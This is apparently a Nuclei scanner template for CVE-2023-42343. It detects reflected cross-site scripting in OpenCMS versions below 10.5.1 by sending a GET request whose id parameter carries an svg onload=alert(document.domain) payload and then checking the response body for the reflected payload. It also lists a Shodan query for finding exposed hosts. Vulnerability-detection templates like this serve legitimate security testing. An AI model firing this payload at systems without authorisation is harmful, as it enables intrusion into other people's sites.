35 lines
1.0 KiB
YAML
35 lines
1.0 KiB
YAML
id: CVE-2023-42343
|
|
|
|
info:
|
|
name: OpenCMS - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
|
|
remediation: Fixed in 10.5.1.
|
|
reference:
|
|
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
|
|
classification:
|
|
cve-id: CVE-2023-42343
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: "/opencms/"
|
|
verified: true
|
|
tags: cve,cve2023,xss,opencms
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
|
|
headers:
|
|
Content-Type: application/cmisquery+xml
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Apache Chemistry OpenCMIS'
|
|
- '<svg onload=alert(document.domain)>'
|
|
condition: and
|
|
# digest: 4a0a00473045022059541a77f42a99970a9f0b5cc68fd577751fffab1e2c2350f636f6e445739f35022100afe449fd219a2ed7b76c45634f3eef7856e4b86c12459e9e002bb08364a2d9cc:922c64590222798bb761d5b6d8e72950 |